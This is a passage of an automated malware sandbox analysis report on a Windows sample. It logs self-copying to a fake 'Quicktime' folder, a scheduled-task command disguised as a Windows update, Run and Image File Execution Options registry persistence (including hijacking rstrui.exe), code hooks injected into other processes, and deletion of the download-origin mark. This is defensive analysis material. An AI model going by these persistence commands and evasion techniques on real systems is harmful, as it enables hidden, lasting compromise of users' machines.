                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02890694 push 00000000h; ret 4_2_02890699
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028906AC push 00000000h; ret 4_2_028906B1
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028906B4 push 00000000h; ret 4_2_028906B9
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028906E0 push 00000000h; ret 4_2_02890699
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0289A603 push es; retf 4_2_0289A616
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895788 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895788 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895710 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895CDC push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895DA0 push 55555555h; ret 4_2_02895DE6
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95BFC push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A98A21 push cs; retf 5_2_03A98AA8
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95898 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95824 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A9581C push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95814 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95858 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A957B8 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95788 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A95710 push 55555555h; ret 5_2_03A95D9C
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A906AC push 00000000h; ret 5_2_03A906B1
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A906B4 push 00000000h; ret 5_2_03A906B9
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A98683 push es; iretd 5_2_03A986F6
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028664BF LoadLibraryA,LoadLibraryA,GetProcAddress,4_2_028664BF
                      Source: BbbEtaIxAU.exeStatic PE information: real checksum: 0x10d86 should be: 0x28166
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exePE file moved: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeJump to behavior

                      Boot Survival

                      barindex
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidationJump to behavior
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\yvneslhpc.exe DisableExceptionChainValidationJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe DebuggerJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Quicktime 8.5.1Jump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Overwrites Windows DLL code with PUSH RET codes
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2904 base: 770D77F0 value: 68 D8 FB AC 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4588 base: 770D77F0 value: 68 D8 FB 39 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2888 base: 770D77F0 value: 68 D8 FB BC 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2892 base: 770D77F0 value: 68 D8 FB 55 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4756 base: 770D77F0 value: 68 D8 FB 7E 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4700 base: 770D77F0 value: 68 D8 FB B8 02 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 3208 base: 770D77F0 value: 68 D8 FB 4F 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 3232 base: 770D77F0 value: 68 D8 FB 5A 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4964 base: 770D77F0 value: 68 D8 FB FD 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2964 base: 770D77F0 value: 68 D8 FB 45 01 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4720 base: 770D77F0 value: 68 D8 FB F5 01 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2872 base: 770D77F0 value: 68 D8 FB 85 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4728 base: 770D77F0 value: 68 D8 FB B4 03 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 2296 base: 770D77F0 value: 68 D8 FB C9 01 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4648 base: 770D77F0 value: 68 D8 FB 51 01 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4636 base: 770D77F0 value: 68 D8 FB 68 01 C3 Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMemory written: PID: 4596 base: 770D77F0 value: 68 D8 FB 21 01 C3 Jump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeFile opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeFile opened: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
